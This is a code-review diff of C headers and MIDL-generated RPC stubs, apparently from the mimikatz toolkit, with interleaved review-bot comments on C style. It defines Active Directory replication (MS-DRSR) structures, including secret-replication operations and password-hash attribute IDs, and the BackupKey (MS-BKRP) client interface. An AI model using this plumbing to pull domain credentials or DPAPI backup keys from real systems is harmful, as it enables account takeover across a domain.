EXOP_REPL_OBJ = 6,
EXOP_REPL_SECRETS = 7
} EXOP_REQ;
#define ATT_RDN 589825
#define ATT_OBJECT_SID 589970
#define ATT_WHEN_CREATED 131074
#define ATT_WHEN_CHANGED 131075
#define ATT_SAM_ACCOUNT_NAME 590045
#define ATT_USER_PRINCIPAL_NAME 590480
#define ATT_SERVICE_PRINCIPAL_NAME 590595
#define ATT_SID_HISTORY 590433
#define ATT_USER_ACCOUNT_CONTROL 589832
#define ATT_SAM_ACCOUNT_TYPE 590126
#define ATT_LOGON_HOURS 589888
#define ATT_LOGON_WORKSTATION 589889
#define ATT_LAST_LOGON 589876
#define ATT_PWD_LAST_SET 589920
#define ATT_ACCOUNT_EXPIRES 589983
#define ATT_LOCKOUT_TIME 590486
#define ATT_UNICODE_PWD 589914
#define ATT_NT_PWD_HISTORY 589918
#define ATT_DBCS_PWD 589879
#define ATT_LM_PWD_HISTORY 589984
#define ATT_SUPPLEMENTAL_CREDENTIALS 589949
#define ATT_CURRENT_VALUE 589851
#define ATT_TRUST_ATTRIBUTES 590294
#define ATT_TRUST_AUTH_INCOMING 589953
#define ATT_TRUST_AUTH_OUTGOING 589959
#define ATT_TRUST_DIRECTION 589956
#define ATT_TRUST_PARENT 590295
#define ATT_TRUST_PARTNER 589957
#define ATT_TRUST_TYPE 589960
void RPC_ENTRY kull_m_rpc_drsr_RpcSecurityCallback(void *Context);
BOOL kull_m_rpc_drsr_getDomainAndUserInfos(RPC_BINDING_HANDLE *hBinding, LPCWSTR ServerName, LPCWSTR Domain, GUID *DomainGUID, LPCWSTR User, LPCWSTR Guid, GUID *UserGuid, DRS_EXTENSIONS_INT *pDrsExtensionsInt);
BOOL kull_m_rpc_drsr_getDCBind(RPC_BINDING_HANDLE *hBinding, GUID *NtdsDsaObjectGuid, DRS_HANDLE *hDrs, DRS_EXTENSIONS_INT *pDrsExtensionsInt);
BOOL kull_m_rpc_drsr_CrackName(DRS_HANDLE hDrs, DS_NAME_FORMAT NameFormat, LPCWSTR Name, DS_NAME_FORMAT FormatWanted, LPWSTR *CrackedName, LPWSTR *CrackedDomain);
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply(REPLENTINFLIST *objects);
BOOL kull_m_rpc_drsr_ProcessGetNCChangesReply_decrypt(ATTRVAL *val);
void kull_m_rpc_drsr_free_DRS_MSG_DCINFOREPLY_data(DWORD dcOutVersion, DRS_MSG_DCINFOREPLY * reply);
void kull_m_rpc_drsr_free_DRS_MSG_CRACKREPLY_data(DWORD nameCrackOutVersion, DRS_MSG_CRACKREPLY * reply);
void kull_m_rpc_drsr_free_DRS_MSG_GETCHGREPLY_data(DWORD dwOutVersion, DRS_MSG_GETCHGREPLY * reply);
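Review bot: The second `DRS_EXT_*` group (`DRS_EXT_ADAM`, `DRS_EXT_LH_BETA2`, `DRS_EXT_RECYCLE_BIN`, `DRS_EXT_GETCHGREPLY_V9`, `DRS_EXT_PAM`) reuses bit values already taken by the first group (`DRS_EXT_BASE`, `DRS_EXT_ASYNCREPL`, `DRS_EXT_REMOVEAPI`, …) under the same prefix, and nothing in the header says which member of `DRS_EXTENSIONS_INT` each group belongs to; the first group already fills all 32 bits, so presumably the second is for `dwFlagsExt`, please confirm against MS-DRSR. I would add a one-line comment before each group, `/* DRS_EXTENSIONS_INT.dwFlags */` above `DRS_EXT_BASE` and `/* DRS_EXTENSIONS_INT.dwFlagsExt */` above `DRS_EXT_ADAM`, and the same treatment for the `DRS_*` request flags where, for example, `DRS_GETCHG_CHECK` and `DRS_UPDATE_NOTIFICATION` are both `0x00000002`: `/* per-call flags; values are reused across different operations */` above `DRS_ASYNC_OP`. Minor style point: `DS_NAME_FORMAT` ends with a trailing comma after `DS_USER_PRINCIPAL_NAME_AND_ALTSECID = -17,` while `DS_NAME_ERROR` and `EXOP_REQ` do not.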


@ -0,0 +1,6 @@
#pragma once
#include "kull_m_rpc.h"
const GUID BACKUPKEY_BACKUP_GUID, BACKUPKEY_RESTORE_GUID_WIN2K, BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, BACKUPKEY_RESTORE_GUID;
NET_API_STATUS BackuprKey(handle_t h, GUID *pguidActionAgent, byte *pDataIn, DWORD cbDataIn, byte **ppDataOut, DWORD *pcbDataOut, DWORD dwParam);
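Review bot: `const GUID BACKUPKEY_BACKUP_GUID, BACKUPKEY_RESTORE_GUID_WIN2K, BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, BACKUPKEY_RESTORE_GUID;` in a header is a tentative definition rather than a declaration, so every translation unit that includes this header defines the four objects and the build appears to rely on the linker merging those uninitialised copies with the initialised ones in the .c file, which C does not guarantee. The declaration should be `extern const GUID BACKUPKEY_BACKUP_GUID, BACKUPKEY_RESTORE_GUID_WIN2K, BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID, BACKUPKEY_RESTORE_GUID;` with the definitions staying where they are. The `BackuprKey` prototype would also benefit from an ownership comment, since the stub description in the accompanying .c wires `MIDL_user_allocate`/`MIDL_user_free`: `/* *ppDataOut is allocated by the RPC runtime; release it with MIDL_user_free */`. `NET_API_STATUS` is not defined by this header or, visibly, by `kull_m_rpc.h`; presumably it arrives through that include, worth a comment if so.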


@ -0,0 +1,325 @@
#include "kull_m_rpc_ms-bkrp.h"
const GUID
BACKUPKEY_BACKUP_GUID = {0x7f752b10, 0x178e, 0x11d1, {0xab, 0x8f, 0x00, 0x80, 0x5f, 0x14, 0xdb, 0x40}},
BACKUPKEY_RESTORE_GUID_WIN2K = {0x7fe94d50, 0x178e, 0x11d1, {0xab, 0x8f, 0x00, 0x80, 0x5f, 0x14, 0xdb, 0x40}},
BACKUPKEY_RETRIEVE_BACKUP_KEY_GUID = {0x018ff48a, 0xeaba, 0x40c6, {0x8f, 0x6d, 0x72, 0x37, 0x02, 0x40, 0xe9, 0x67}},
BACKUPKEY_RESTORE_GUID = {0x47270c64, 0x2fc7, 0x499b, {0xac, 0x5b, 0x0e, 0x37, 0xcd, 0xce, 0x89, 0x9a}};
#if _MSC_VER >= 1200
#pragma warning(push)
#endif
#pragma warning( disable: 4211 ) /* redefine extern to static */
#pragma warning( disable: 4232 ) /* dllimport identity*/
#pragma warning( disable: 4024 ) /* array to pointer mapping*/
#ifdef _M_X64
typedef struct _ms2Dbkrp_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[65];
} ms2Dbkrp_MIDL_TYPE_FORMAT_STRING;
typedef struct _ms2Dbkrp_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[73];
} ms2Dbkrp_MIDL_PROC_FORMAT_STRING;
extern const ms2Dbkrp_MIDL_TYPE_FORMAT_STRING ms2Dbkrp__MIDL_TypeFormatString;
extern const ms2Dbkrp_MIDL_PROC_FORMAT_STRING ms2Dbkrp__MIDL_ProcFormatString;
static const RPC_CLIENT_INTERFACE BackupKey___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0x3dde7c30, 0x165d, 0x11d1, {0xab, 0x8f, 0x00, 0x80, 0x5f, 0x14, 0xdb, 0x40}}, {1, 0}}, {{0x8A885D04, 0x1CEB, 0x11C9, {0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000};
static RPC_BINDING_HANDLE BackupKey__MIDL_AutoBindHandle;
static const MIDL_STUB_DESC BackupKey_StubDesc = {(void *) &BackupKey___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &BackupKey__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Dbkrp__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
NET_API_STATUS BackuprKey(handle_t h, GUID *pguidActionAgent, byte *pDataIn, DWORD cbDataIn, byte **ppDataOut, DWORD *pcbDataOut, DWORD dwParam)
{
return (NET_API_STATUS) NdrClientCall2((PMIDL_STUB_DESC) &BackupKey_StubDesc, (PFORMAT_STRING) &ms2Dbkrp__MIDL_ProcFormatString.Format[0], h, pguidActionAgent, pDataIn, cbDataIn, ppDataOut, pcbDataOut, dwParam).Simple;
}
#if !defined(__RPC_WIN64__)
#error Invalid build platform for this stub.
#endif
static const ms2Dbkrp_MIDL_PROC_FORMAT_STRING ms2Dbkrp__MIDL_ProcFormatString = {
0,
{
/* Procedure BackuprKey */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x40 ), /* X64 Stack size/offset = 64 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* X64 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x54 ), /* 84 */
/* 16 */ NdrFcShort( 0x24 ), /* 36 */
/* 18 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */
0x7, /* 7 */
/* 20 */ 0xa, /* 10 */
0x7, /* Ext Flags: new corr desc, clt corr check, srv corr check, */
/* 22 */ NdrFcShort( 0x1 ), /* 1 */
/* 24 */ NdrFcShort( 0x1 ), /* 1 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* 28 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter h */
/* 30 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */
/* 32 */ NdrFcShort( 0x8 ), /* X64 Stack size/offset = 8 */
/* 34 */ NdrFcShort( 0xc ), /* Type Offset=12 */
/* Parameter pguidActionAgent */
/* 36 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 38 */ NdrFcShort( 0x10 ), /* X64 Stack size/offset = 16 */
/* 40 */ NdrFcShort( 0x1c ), /* Type Offset=28 */
/* Parameter pDataIn */
/* 42 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 44 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 46 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter cbDataIn */
/* 48 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */
/* 50 */ NdrFcShort( 0x20 ), /* X64 Stack size/offset = 32 */
/* 52 */ NdrFcShort( 0x28 ), /* Type Offset=40 */
/* Parameter ppDataOut */
/* 54 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */
/* 56 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */
/* 58 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter pcbDataOut */
/* 60 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 62 */ NdrFcShort( 0x30 ), /* X64 Stack size/offset = 48 */
/* 64 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter dwParam */
/* 66 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 68 */ NdrFcShort( 0x38 ), /* X64 Stack size/offset = 56 */
/* 70 */ 0x8, /* FC_LONG */
0x0, /* 0 */
0x0
}
};
static const ms2Dbkrp_MIDL_TYPE_FORMAT_STRING ms2Dbkrp__MIDL_TypeFormatString = {
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x0, /* FC_RP */
/* 4 */ NdrFcShort( 0x8 ), /* Offset= 8 (12) */
/* 6 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 8 */ NdrFcShort( 0x8 ), /* 8 */
/* 10 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 12 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 14 */ NdrFcShort( 0x10 ), /* 16 */
/* 16 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 18 */ 0x6, /* FC_SHORT */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 20 */ 0x0, /* 0 */
NdrFcShort( 0xfff1 ), /* Offset= -15 (6) */
0x5b, /* FC_END */
/* 24 */
0x11, 0x0, /* FC_RP */
/* 26 */ NdrFcShort( 0x2 ), /* Offset= 2 (28) */
/* 28 */
0x1b, /* FC_CARRAY */
0x0, /* 0 */
/* 30 */ NdrFcShort( 0x1 ), /* 1 */
/* 32 */ 0x29, /* Corr desc: parameter, FC_ULONG */
0x0, /* */
/* 34 */ NdrFcShort( 0x18 ), /* X64 Stack size/offset = 24 */
/* 36 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 38 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 40 */
0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */
/* 42 */ NdrFcShort( 0x2 ), /* Offset= 2 (44) */
/* 44 */
0x12, 0x0, /* FC_UP */
/* 46 */ NdrFcShort( 0x2 ), /* Offset= 2 (48) */
/* 48 */
0x1b, /* FC_CARRAY */
0x0, /* 0 */
/* 50 */ NdrFcShort( 0x1 ), /* 1 */
/* 52 */ 0x29, /* Corr desc: parameter, FC_ULONG */
0x54, /* FC_DEREFERENCE */
/* 54 */ NdrFcShort( 0x28 ), /* X64 Stack size/offset = 40 */
/* 56 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 58 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 60 */
0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */
/* 62 */ 0x8, /* FC_LONG */
0x5c, /* FC_PAD */
0x0
}
};
#elif defined _M_IX86
typedef struct _ms2Dbkrp_MIDL_TYPE_FORMAT_STRING
{
short Pad;
unsigned char Format[65];
} ms2Dbkrp_MIDL_TYPE_FORMAT_STRING;
typedef struct _ms2Dbkrp_MIDL_PROC_FORMAT_STRING
{
short Pad;
unsigned char Format[71];
} ms2Dbkrp_MIDL_PROC_FORMAT_STRING;
extern const ms2Dbkrp_MIDL_TYPE_FORMAT_STRING ms2Dbkrp__MIDL_TypeFormatString;
extern const ms2Dbkrp_MIDL_PROC_FORMAT_STRING ms2Dbkrp__MIDL_ProcFormatString;
static const RPC_CLIENT_INTERFACE BackupKey___RpcClientInterface = {sizeof(RPC_CLIENT_INTERFACE), {{0x3dde7c30, 0x165d, 0x11d1, {0xab, 0x8f, 0x00, 0x80, 0x5f, 0x14, 0xdb, 0x40}}, {1, 0}}, {{0x8A885D04, 0x1CEB, 0x11C9, {0x9F, 0xE8, 0x08, 0x00, 0x2B, 0x10, 0x48, 0x60}}, {2, 0}}, 0, 0, 0, 0, 0, 0x00000000};
static RPC_BINDING_HANDLE BackupKey__MIDL_AutoBindHandle;
static const MIDL_STUB_DESC BackupKey_StubDesc = {(void *) &BackupKey___RpcClientInterface, MIDL_user_allocate, MIDL_user_free, &BackupKey__MIDL_AutoBindHandle, 0, 0, 0, 0, ms2Dbkrp__MIDL_TypeFormatString.Format, 1, 0x60000, 0, 0x8000253, 0, 0, 0, 0x1, 0, 0, 0};
#pragma optimize("", off)
NET_API_STATUS BackuprKey(handle_t h, GUID *pguidActionAgent, byte *pDataIn, DWORD cbDataIn, byte **ppDataOut, DWORD *pcbDataOut, DWORD dwParam)
{
return (NET_API_STATUS) NdrClientCall2((PMIDL_STUB_DESC) &BackupKey_StubDesc, (PFORMAT_STRING) &ms2Dbkrp__MIDL_ProcFormatString.Format[0], (unsigned char *) &h).Simple;
}
#pragma optimize("", on)
#if !defined(__RPC_WIN32__)
#error Invalid build platform for this stub.
#endif
#if !(TARGET_IS_NT51_OR_LATER)
#error You need Windows XP or later to run this stub because it uses these features:
#error compiled for Windows XP.
#error However, your C/C++ compilation flags indicate you intend to run this app on earlier systems.
#error This app will fail with the RPC_X_WRONG_STUB_VERSION error.
#endif
static const ms2Dbkrp_MIDL_PROC_FORMAT_STRING ms2Dbkrp__MIDL_ProcFormatString = {
0,
{
/* Procedure BackuprKey */
0x0, /* 0 */
0x48, /* Old Flags: */
/* 2 */ NdrFcLong( 0x0 ), /* 0 */
/* 6 */ NdrFcShort( 0x0 ), /* 0 */
/* 8 */ NdrFcShort( 0x20 ), /* x86 Stack size/offset = 32 */
/* 10 */ 0x32, /* FC_BIND_PRIMITIVE */
0x0, /* 0 */
/* 12 */ NdrFcShort( 0x0 ), /* x86 Stack size/offset = 0 */
/* 14 */ NdrFcShort( 0x54 ), /* 84 */
/* 16 */ NdrFcShort( 0x24 ), /* 36 */
/* 18 */ 0x47, /* Oi2 Flags: srv must size, clt must size, has return, has ext, */
0x7, /* 7 */
/* 20 */ 0x8, /* 8 */
0x7, /* Ext Flags: new corr desc, clt corr check, srv corr check, */
/* 22 */ NdrFcShort( 0x1 ), /* 1 */
/* 24 */ NdrFcShort( 0x1 ), /* 1 */
/* 26 */ NdrFcShort( 0x0 ), /* 0 */
/* Parameter h */
/* 28 */ NdrFcShort( 0x10a ), /* Flags: must free, in, simple ref, */
/* 30 */ NdrFcShort( 0x4 ), /* x86 Stack size/offset = 4 */
/* 32 */ NdrFcShort( 0xc ), /* Type Offset=12 */
/* Parameter pguidActionAgent */
/* 34 */ NdrFcShort( 0x10b ), /* Flags: must size, must free, in, simple ref, */
/* 36 */ NdrFcShort( 0x8 ), /* x86 Stack size/offset = 8 */
/* 38 */ NdrFcShort( 0x1c ), /* Type Offset=28 */
/* Parameter pDataIn */
/* 40 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 42 */ NdrFcShort( 0xc ), /* x86 Stack size/offset = 12 */
/* 44 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter cbDataIn */
/* 46 */ NdrFcShort( 0x2013 ), /* Flags: must size, must free, out, srv alloc size=8 */
/* 48 */ NdrFcShort( 0x10 ), /* x86 Stack size/offset = 16 */
/* 50 */ NdrFcShort( 0x28 ), /* Type Offset=40 */
/* Parameter ppDataOut */
/* 52 */ NdrFcShort( 0x2150 ), /* Flags: out, base type, simple ref, srv alloc size=8 */
/* 54 */ NdrFcShort( 0x14 ), /* x86 Stack size/offset = 20 */
/* 56 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter pcbDataOut */
/* 58 */ NdrFcShort( 0x48 ), /* Flags: in, base type, */
/* 60 */ NdrFcShort( 0x18 ), /* x86 Stack size/offset = 24 */
/* 62 */ 0x8, /* FC_LONG */
0x0, /* 0 */
/* Parameter dwParam */
/* 64 */ NdrFcShort( 0x70 ), /* Flags: out, return, base type, */
/* 66 */ NdrFcShort( 0x1c ), /* x86 Stack size/offset = 28 */
/* 68 */ 0x8, /* FC_LONG */
0x0, /* 0 */
0x0
}
};
static const ms2Dbkrp_MIDL_TYPE_FORMAT_STRING ms2Dbkrp__MIDL_TypeFormatString = {
0,
{
NdrFcShort( 0x0 ), /* 0 */
/* 2 */
0x11, 0x0, /* FC_RP */
/* 4 */ NdrFcShort( 0x8 ), /* Offset= 8 (12) */
/* 6 */
0x1d, /* FC_SMFARRAY */
0x0, /* 0 */
/* 8 */ NdrFcShort( 0x8 ), /* 8 */
/* 10 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 12 */
0x15, /* FC_STRUCT */
0x3, /* 3 */
/* 14 */ NdrFcShort( 0x10 ), /* 16 */
/* 16 */ 0x8, /* FC_LONG */
0x6, /* FC_SHORT */
/* 18 */ 0x6, /* FC_SHORT */
0x4c, /* FC_EMBEDDED_COMPLEX */
/* 20 */ 0x0, /* 0 */
NdrFcShort( 0xfff1 ), /* Offset= -15 (6) */
0x5b, /* FC_END */
/* 24 */
0x11, 0x0, /* FC_RP */
/* 26 */ NdrFcShort( 0x2 ), /* Offset= 2 (28) */
/* 28 */
0x1b, /* FC_CARRAY */
0x0, /* 0 */
/* 30 */ NdrFcShort( 0x1 ), /* 1 */
/* 32 */ 0x29, /* Corr desc: parameter, FC_ULONG */
0x0, /* */
/* 34 */ NdrFcShort( 0xc ), /* x86 Stack size/offset = 12 */
/* 36 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 38 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 40 */
0x11, 0x14, /* FC_RP [alloced_on_stack] [pointer_deref] */
/* 42 */ NdrFcShort( 0x2 ), /* Offset= 2 (44) */
/* 44 */
0x12, 0x0, /* FC_UP */
/* 46 */ NdrFcShort( 0x2 ), /* Offset= 2 (48) */
/* 48 */
0x1b, /* FC_CARRAY */
0x0, /* 0 */
/* 50 */ NdrFcShort( 0x1 ), /* 1 */
/* 52 */ 0x29, /* Corr desc: parameter, FC_ULONG */
0x54, /* FC_DEREFERENCE */
/* 54 */ NdrFcShort( 0x14 ), /* x86 Stack size/offset = 20 */
/* 56 */ NdrFcShort( 0x0 ), /* Corr flags: */
/* 58 */ 0x1, /* FC_BYTE */
0x5b, /* FC_END */
/* 60 */
0x11, 0xc, /* FC_RP [alloced_on_stack] [simple_pointer] */
/* 62 */ 0x8, /* FC_LONG */
0x5c, /* FC_PAD */
0x0
}
};
#endif
#if _MSC_VER >= 1200
#pragma warning(pop)
#endif


@ -0,0 +1,465 @@
#pragma once
#include "kull_m_rpc.h"
typedef LONGLONG DSTIME;
typedef LONGLONG USN;
typedef ULONG ATTRTYP;
typedef void *DRS_HANDLE;
typedef struct _NT4SID {
unsigned char Data[ 28 ];
} NT4SID;
typedef struct _DSNAME {
unsigned long structLen;
unsigned long SidLen;
GUID Guid;
NT4SID Sid;
unsigned long NameLen;
WCHAR StringName[ANYSIZE_ARRAY];
} DSNAME;
typedef struct _USN_VECTOR {
USN usnHighObjUpdate;
USN usnReserved;
USN usnHighPropUpdate;
} USN_VECTOR;
typedef struct _UPTODATE_CURSOR_V1 {
UUID uuidDsa;
USN usnHighPropUpdate;
} UPTODATE_CURSOR_V1;
typedef struct _UPTODATE_VECTOR_V1_EXT {
DWORD dwVersion;
DWORD dwReserved1;
DWORD cNumCursors;
DWORD dwReserved2;
UPTODATE_CURSOR_V1 rgCursors[ANYSIZE_ARRAY];
} UPTODATE_VECTOR_V1_EXT;
typedef struct _OID_t {
unsigned int length;
BYTE *elements;
} OID_t;
typedef struct _PrefixTableEntry {
unsigned long ndx;
OID_t prefix;
} PrefixTableEntry;
typedef struct _SCHEMA_PREFIX_TABLE {
DWORD PrefixCount;
PrefixTableEntry *pPrefixEntry;
} SCHEMA_PREFIX_TABLE;
typedef struct _PARTIAL_ATTR_VECTOR_V1_EXT {
DWORD dwVersion;
DWORD dwReserved1;
DWORD cAttrs;
ATTRTYP rgPartialAttr[ANYSIZE_ARRAY];
} PARTIAL_ATTR_VECTOR_V1_EXT;
typedef struct _MTX_ADDR {
unsigned long mtx_namelen;
unsigned char mtx_name[ANYSIZE_ARRAY];
} MTX_ADDR;
typedef struct _ATTRVAL {
ULONG valLen;
UCHAR *pVal;
} ATTRVAL;
typedef struct _ATTRVALBLOCK {
ULONG valCount;
ATTRVAL *pAVal;
} ATTRVALBLOCK;
typedef struct _ATTR {
ATTRTYP attrTyp;
ATTRVALBLOCK AttrVal;
} ATTR;
typedef struct _ATTRBLOCK {
ULONG attrCount;
ATTR *pAttr;
} ATTRBLOCK;
typedef struct _ENTINF {
DSNAME *pName;
unsigned long ulFlags;
ATTRBLOCK AttrBlock;
} ENTINF;
typedef struct _PROPERTY_META_DATA_EXT {
DWORD dwVersion;
DSTIME timeChanged;
UUID uuidDsaOriginating;
USN usnOriginating;
} PROPERTY_META_DATA_EXT;
typedef struct _PROPERTY_META_DATA_EXT_VECTOR {
DWORD cNumProps;
PROPERTY_META_DATA_EXT rgMetaData[ANYSIZE_ARRAY];
} PROPERTY_META_DATA_EXT_VECTOR;
typedef struct _REPLENTINFLIST {
struct _REPLENTINFLIST *pNextEntInf;
ENTINF Entinf;
BOOL fIsNCPrefix;
UUID *pParentGuid;
PROPERTY_META_DATA_EXT_VECTOR *pMetaDataExt;
} REPLENTINFLIST;
typedef struct _UPTODATE_CURSOR_V2 {
UUID uuidDsa;
USN usnHighPropUpdate;
DSTIME timeLastSyncSuccess;
} UPTODATE_CURSOR_V2;
typedef struct _UPTODATE_VECTOR_V2_EXT {
DWORD dwVersion;
DWORD dwReserved1;
DWORD cNumCursors;
DWORD dwReserved2;
UPTODATE_CURSOR_V2 rgCursors[ANYSIZE_ARRAY];
} UPTODATE_VECTOR_V2_EXT;
typedef struct _VALUE_META_DATA_EXT_V1 {
DSTIME timeCreated;
PROPERTY_META_DATA_EXT MetaData;
} VALUE_META_DATA_EXT_V1;
typedef struct _VALUE_META_DATA_EXT_V3 {
DSTIME timeCreated;
PROPERTY_META_DATA_EXT MetaData;
DWORD unused1;
DWORD unused2;
DWORD unused3;
DSTIME timeExpired;
} VALUE_META_DATA_EXT_V3;
typedef struct _REPLVALINF_V1 {
DSNAME *pObject;
ATTRTYP attrTyp;
ATTRVAL Aval;
BOOL fIsPresent;
VALUE_META_DATA_EXT_V1 MetaData;
} REPLVALINF_V1;
typedef struct REPLVALINF_V3 {
DSNAME *pObject;
ATTRTYP attrTyp;
ATTRVAL Aval;
BOOL fIsPresent;
VALUE_META_DATA_EXT_V3 MetaData;
} REPLVALINF_V3;
typedef struct _DS_NAME_RESULT_ITEMW {
DWORD status;
WCHAR *pDomain;
WCHAR *pName;
} DS_NAME_RESULT_ITEMW, *PDS_NAME_RESULT_ITEMW;
typedef struct _DS_NAME_RESULTW {
DWORD cItems;
PDS_NAME_RESULT_ITEMW rItems;
} DS_NAME_RESULTW, *PDS_NAME_RESULTW;
typedef struct _DS_DOMAIN_CONTROLLER_INFO_1W {
WCHAR *NetbiosName;
WCHAR *DnsHostName;
WCHAR *SiteName;
WCHAR *ComputerObjectName;
WCHAR *ServerObjectName;
BOOL fIsPdc;
BOOL fDsEnabled;
} DS_DOMAIN_CONTROLLER_INFO_1W;
typedef struct _DS_DOMAIN_CONTROLLER_INFO_2W {
WCHAR *NetbiosName;
WCHAR *DnsHostName;
WCHAR *SiteName;
WCHAR *SiteObjectName;
WCHAR *ComputerObjectName;
WCHAR *ServerObjectName;
WCHAR *NtdsDsaObjectName;
BOOL fIsPdc;
BOOL fDsEnabled;
BOOL fIsGc;
GUID SiteObjectGuid;
GUID ComputerObjectGuid;
GUID ServerObjectGuid;
GUID NtdsDsaObjectGuid;
} DS_DOMAIN_CONTROLLER_INFO_2W;
typedef struct _DS_DOMAIN_CONTROLLER_INFO_3W {
WCHAR *NetbiosName;
WCHAR *DnsHostName;
WCHAR *SiteName;
WCHAR *SiteObjectName;
WCHAR *ComputerObjectName;
WCHAR *ServerObjectName;
WCHAR *NtdsDsaObjectName;
BOOL fIsPdc;
BOOL fDsEnabled;
BOOL fIsGc;
BOOL fIsRodc;
GUID SiteObjectGuid;
GUID ComputerObjectGuid;
GUID ServerObjectGuid;
GUID NtdsDsaObjectGuid;
} DS_DOMAIN_CONTROLLER_INFO_3W;
typedef struct _DS_DOMAIN_CONTROLLER_INFO_FFFFFFFFW {
DWORD IPAddress;
DWORD NotificationCount;
DWORD secTimeConnected;
DWORD Flags;
DWORD TotalRequests;
DWORD Reserved1;
WCHAR *UserName;
} DS_DOMAIN_CONTROLLER_INFO_FFFFFFFFW;
typedef struct _ENTINFLIST {
struct _ENTINFLIST *pNextEntInf;
ENTINF Entinf;
} ENTINFLIST;
typedef struct _DRS_EXTENSIONS {
DWORD cb;
BYTE rgb[ANYSIZE_ARRAY];
} DRS_EXTENSIONS;
typedef struct _DRS_MSG_GETCHGREQ_V3 {
UUID uuidDsaObjDest;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
UPTODATE_VECTOR_V1_EXT *pUpToDateVecDestV1;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrVecDestV1;
SCHEMA_PREFIX_TABLE PrefixTableDest;
ULONG ulFlags;
ULONG cMaxObjects;
ULONG cMaxBytes;
ULONG ulExtendedOp;
} DRS_MSG_GETCHGREQ_V3;
typedef struct _DRS_MSG_GETCHGREQ_V4 {
UUID uuidTransportObj;
MTX_ADDR *pmtxReturnAddress;
DRS_MSG_GETCHGREQ_V3 V3;
} DRS_MSG_GETCHGREQ_V4;
typedef struct _DRS_MSG_GETCHGREQ_V7 {
UUID uuidTransportObj;
MTX_ADDR *pmtxReturnAddress;
DRS_MSG_GETCHGREQ_V3 V3;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSet;
PARTIAL_ATTR_VECTOR_V1_EXT *pPartialAttrSetEx;
SCHEMA_PREFIX_TABLE PrefixTableDest;
} DRS_MSG_GETCHGREQ_V7;
typedef struct _DRS_MSG_GETCHGREPLY_V1 {
UUID uuidDsaObjSrc;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
USN_VECTOR usnvecTo;
UPTODATE_VECTOR_V1_EXT *pUpToDateVecSrcV1;
SCHEMA_PREFIX_TABLE PrefixTableSrc;
ULONG ulExtendedRet;
ULONG cNumObjects;
ULONG cNumBytes;
REPLENTINFLIST *pObjects;
BOOL fMoreData;
} DRS_MSG_GETCHGREPLY_V1;
typedef struct _DRS_MSG_GETCHGREPLY_V6 {
UUID uuidDsaObjSrc;
UUID uuidInvocIdSrc;
DSNAME *pNC;
USN_VECTOR usnvecFrom;
USN_VECTOR usnvecTo;
UPTODATE_VECTOR_V2_EXT *pUpToDateVecSrc;
SCHEMA_PREFIX_TABLE PrefixTableSrc;
ULONG ulExtendedRet;
ULONG cNumObjects;
ULONG cNumBytes;
REPLENTINFLIST *pObjects;
BOOL fMoreData;
ULONG cNumNcSizeObjects;
ULONG cNumNcSizeValues;
DWORD cNumValues;
REPLVALINF_V1 *rgValues;
DWORD dwDRSError;
} DRS_MSG_GETCHGREPLY_V6;
typedef struct _DRS_MSG_GETCHGREPLY_V9 {
UUID uuidDsaObjSrc;
UUID uuidInvocIdSrc;
DSNAME *pNC;
